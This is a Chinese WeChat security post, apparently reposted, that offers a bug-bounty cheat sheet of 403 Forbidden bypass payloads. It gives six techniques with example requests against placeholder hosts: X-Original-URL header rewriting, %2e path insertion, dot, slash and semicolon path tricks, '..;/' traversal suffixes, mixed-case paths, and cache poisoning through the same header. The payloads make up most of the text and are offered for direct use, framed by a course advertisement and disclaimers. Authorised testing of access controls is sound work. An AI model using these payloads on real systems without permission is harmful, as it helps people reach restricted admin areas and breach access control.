由于微信公众号推送机制的改变避免错过文章麻烦您将公众号设为星标感谢您的支持!
想要学习:【漏洞挖掘,内网渗透OSCP,车联网,二进制】的朋友欢迎加入知识星球一起学习。如果不满意,72小时内可在APP内无条件自助退款。
1,使用“X-Original-URL”标头
GET /admin HTTP/1.1Host: target.com尝试这个来绕过GET /anything HTTP/1.1Host: target.comX-Original-URL: /admin
2,在第一个斜杠后附加 %2e
http://target.com/admin => 403尝试这个来绕过http://target.com/%2e/admin => 200
3,尝试在 URL 中添加点 (.) 斜杠 (/) 和分号 (;)
http://target.com/admin => 403尝试这个来绕过http://target.com/secret/. => 200http://target.com//secret// => 200http://target.com/./secret/.. => 200http://target.com/;/secret => 200http://target.com/.;/secret => 200http://target.com//;//secret => 200
4,在目录名后添加“..;/”
http://target.com/admin尝试这个来绕过http://target.com/admin..;/
5,尝试将 url 中的字母大写
http://target.com/admin尝试这个来绕过http://target.com/aDmIN
6,通过网络缓存中毒
GET /anything HTTP/1.1Host: victim.comX-Original-URL: /admin
喜欢朋友可以点点赞转发转发。
免责声明:本公众号不承担任何由于传播、利用本公众号所发布内容而造成的任何后果及法律责任。未经许可,不得转载。
原文始发于微信公众号(重生者安全团队):【赏金猎人】403绕过Payload+场景
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论